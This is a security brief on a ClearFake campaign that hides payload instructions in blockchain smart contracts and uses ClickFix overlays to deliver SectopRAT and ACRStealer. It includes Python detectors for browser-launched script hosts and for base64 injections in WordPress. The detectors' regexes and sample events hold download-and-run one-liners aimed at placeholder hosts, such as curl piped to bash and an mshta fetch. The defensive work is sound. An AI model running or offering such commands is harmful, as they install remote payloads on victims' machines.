What Happened
Trend Micro researchers have documented a ClearFake campaign that uses a technique called EtherHiding to store malware payload instructions inside BNB Smart Chain testnet smart contracts. When a victim visits a compromised WordPress site, injected base64-encoded JavaScript retrieves an ABI string from the blockchain, loads the associated smart contract, and receives the current attack payload — all over standard HTTPS to legitimate Binance infrastructure.
The campaign simultaneously delivers two payloads: SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ credential-stealing tool. The routing logic detects the victim’s operating system and serves separate payloads for Windows and macOS. A ClickFix social engineering overlay on the compromised site prompts the victim to run the payload manually. Trend Micro found that four smart contracts shared a single deployer wallet, with the oldest contract deployed nearly a year before the analysis — confirming this is a long-running, maintained campaign.
Source: Trend Micro
Why This Matters for Canadian Organizations
Traditional threat intelligence and blocking infrastructure targets attacker-controlled domains and IP addresses. Blockchain-based C2 removes that blocking point entirely. Because the BNB Smart Chain testnet is a legitimate public blockchain service, network defenders cannot block the C2 channel without blocking all Binance-related infrastructure — a step no organization is realistically going to take. The instructions stored on-chain are also immutable: law enforcement takedowns, domain seizures, and hosting provider abuse reports are ineffective against smart contracts.
Canadian organizations running large WordPress fleets — government portals, media organizations, educational institutions, municipal websites — face direct exposure as potential delivery vectors for this campaign. The ClickFix overlay is a familiar delivery mechanism that bypasses email security entirely, targeting users who browse to compromised legitimate sites. SectopRAT’s session hijacking capability means an infected workstation in a Canadian bank, insurer, or government department can give attackers authenticated access to corporate web applications, bypassing multi-factor authentication.
The malware also targets macOS — a platform common in Canadian creative, technology, and professional services environments, where endpoint detection coverage is often weaker than on Windows. Under PIPEDA, any breach resulting from a successful SectopRAT or ACRStealer infection that accesses personal information triggers notification obligations.
What to Do
Defenders should look at this campaign from the endpoint perspective rather than the network perspective. Block or alert on PowerShell and scripting engine executions launched from browser processes — the ClickFix delivery mechanism relies on a user pasting and running a command from the browser overlay. Ensure endpoint detection tools are configured to flag SectopRAT and ACRStealer indicators published by Trend Micro.
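The endpoint rule above, worked through as an added example (not code from Trend Micro or from this brief): it classifies Sysmon-style process-creation events and flags script hosts spawned by a browser. It also goes slightly beyond the text by covering the two common ClickFix variants in which the parent is not the browser: the Windows Run dialog (parent explorer.exe, command line shaped like a pasted one-liner) and a macOS Terminal paste of a curl | sh one-liner. The browser and script-host name lists, the regexes and the sample events are constructed assumptions to tune per environment.

```python
"""Flag process launches matching the ClickFix pattern described above.

Added example for this brief: the events are constructed Sysmon-style
process-creation records, not data from the Trend Micro report, and the
name lists and regexes are assumptions to tune per environment.
"""
import json
import re
from typing import List, Optional, Tuple

# Browsers in which a ClickFix overlay would be displayed (assumed list).
BROWSER_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
# Script hosts and shells typically used to run the pasted command (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "sh", "bash", "zsh", "osascript"}
# Features of pasted one-liners: hidden window, encoded/bypass flags, download-and-run.
PASTED_ONELINER = re.compile(
    r"(-enc\w*\s|-w(indowstyle)?\s+hidden|-ep\s+bypass|executionpolicy\s+bypass|"
    r"\biwr\b|invoke-webrequest|\birm\b|invoke-restmethod|downloadstring|"
    r"\biex\b|invoke-expression|mshta\s+https?://)",
    re.IGNORECASE,
)
# macOS/Linux variant: curl output piped straight into a shell.
PIPE_TO_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(ba|z)?sh\b", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-case file name for either Windows or POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return an alert label for one process-creation event, or None if benign."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image not in SCRIPT_HOSTS:
        return None
    if parent in BROWSER_PARENTS:
        # The brief's primary indicator: a script host spawned directly by a browser.
        return "script-host-from-browser"
    if parent == "explorer.exe" and PASTED_ONELINER.search(cmdline):
        # Win+R variant: the Run dialog launches the host, so the parent is explorer.exe.
        return "script-host-from-run-dialog"
    if parent == "terminal" and PIPE_TO_SHELL.search(cmdline):
        # macOS variant: the user pastes a curl | sh one-liner into Terminal.
        return "pipe-to-shell-from-terminal"
    return None


def scan(log_text: str) -> List[Tuple[str, str, str]]:
    """Parse JSON-lines process events and return (label, image, command line) per hit."""
    hits = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records rather than abort the scan
        label = classify(event)
        if label:
            hits.append((label, _basename(event.get("Image", "")), event.get("CommandLine", "")))
    return hits


# Constructed sample events; paths, hosts and command lines are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc QQBCAEMA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://cdn.example.invalid/verify.hta"},
    {"ParentImage": "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "Image": "/bin/bash",
     "CommandLine": "bash -c 'curl -fsSL https://cdn.example.invalid/fix.sh | bash'"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for label, image, cmd in scan(SAMPLE_LOG):
        print(f"{label:32} {image:16} {cmd}")
```

Of the five constructed events, the first three are flagged (browser parent, Run-dialog one-liner, Terminal pipe-to-shell) and the last two are not: an administrator running PowerShell from the Run dialog with an ordinary command, and a browser opening Notepad. The parent-is-browser rule needs no command-line heuristics at all, which is why it is the most robust of the three; the other two rules trade some false positives for coverage of the variants the brief's endpoint-first advice implies.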
WordPress site operators should audit their installations for unauthorized JavaScript injections. Review file integrity monitoring alerts and server access logs for the past year, given how long this campaign has been running. Keep WordPress core, plugins, and themes current — initial compromise in these campaigns typically exploits known plugin vulnerabilities.
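One way to perform the injection audit above, written as an added example (not code from Trend Micro, WordPress or this brief): it walks a site tree, decodes every long base64 run in PHP, JavaScript and HTML files, and reports blobs whose decoded text contains several strings a loader would need in order to read a smart contract over JSON-RPC, which is the mechanism described under "What Happened". The length threshold, the indicator keyword list and the sample page are assumptions constructed for the example, not Trend Micro's published indicators; the sample "injection" is deliberately inert text with placeholder endpoint and address.

```python
"""Find base64-wrapped scripts in a WordPress tree that look like on-chain loaders.

Added example for this brief. The indicator keywords, the blob-length threshold
and the sample page are assumptions constructed for the example; they are not
Trend Micro's published indicators.
"""
import base64
import re
from pathlib import Path
from typing import Dict, Iterator, List, Tuple

# A base64 run long enough to hold a script (assumed threshold; tune per site).
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
# Strings a decoded loader would need to read a contract over JSON-RPC (assumed list).
CHAIN_INDICATORS = [
    re.compile(p, re.IGNORECASE)
    for p in (r"eth_call", r"\bjsonrpc\b", r"\bbinance\b", r"\bbsc\b",
              r"web3", r"ethers", r"\babi\b", r"0x[0-9a-fA-F]{40}")
]


def decode_blobs(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (blob, decoded_text) for each base64 run that decodes to readable text."""
    for match in B64_BLOB.finditer(text):
        blob = match.group(0)
        core = blob.rstrip("=")
        try:
            raw = base64.b64decode(core + "=" * (-len(core) % 4), validate=True)
            decoded = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # binary data (images, fonts) is not a script
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            yield blob, decoded


def indicators_in(decoded: str) -> List[str]:
    """Return the indicator patterns present in a decoded blob."""
    return [p.pattern for p in CHAIN_INDICATORS if p.search(decoded)]


def scan_text(text: str, min_indicators: int = 3) -> List[Dict[str, object]]:
    """Return one finding per blob carrying at least min_indicators chain-related strings."""
    findings = []
    for blob, decoded in decode_blobs(text):
        hits = indicators_in(decoded)
        if len(hits) >= min_indicators:
            findings.append({"blob_prefix": blob[:24], "indicators": hits,
                             "decoded_preview": decoded[:80]})
    return findings


def scan_tree(root: str, suffixes=(".php", ".js", ".html")) -> Dict[str, list]:
    """Walk a WordPress install and map each file path to its findings."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            try:
                found = scan_text(path.read_text(errors="ignore"))
            except OSError:
                continue
            if found:
                results[str(path)] = found
    return results


# Constructed, inert sample of what a decoded injection might contain; placeholders only.
SAMPLE_INJECTED = (
    "/* constructed sample for this scanner, not a working loader */\n"
    "var rpc='https://rpc.example.invalid'; /* placeholder endpoint */\n"
    "var contract='0x0000000000000000000000000000000000000000'; /* placeholder address */\n"
    "var req={jsonrpc:'2.0',method:'eth_call',params:[{to:contract},'latest']};\n"
    "/* a real loader would POST req, decode the returned ABI string and run it */\n"
)
SAMPLE_PAGE = ('<html><body><script>eval(atob("'
               + base64.b64encode(SAMPLE_INJECTED.encode()).decode()
               + '"))</script></body></html>')
# Two benign blobs: an embedded binary asset and a long plain-text string.
BENIGN_PAGE = ('<img src="data:image/png;base64,'
               + base64.b64encode(bytes(range(256)) * 2).decode() + '">'
               + '<script>var t=atob("'
               + base64.b64encode(b"lorem ipsum dolor sit amet " * 12).decode()
               + '");</script>')

if __name__ == "__main__":
    for finding in scan_text(SAMPLE_PAGE):
        print(finding["indicators"], finding["decoded_preview"])
```

Run scan_tree against the web root (wp-content/themes and wp-content/plugins are the usual injection sites) and compare any hit against the file's expected contents from a clean copy of the same theme or plugin version. Requiring several indicators at once keeps legitimate base64 assets and inline data URIs out of the results, as the benign sample page shows; lower min_indicators if you are hunting rather than monitoring.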
For security architecture teams: recognize that blockchain-based C2 represents a class of infrastructure that traditional domain-reputation and IP-block approaches cannot disrupt. Detection must shift to behavioural indicators at the endpoint. Document this technique in your threat models for board-level and insurance reporting purposes.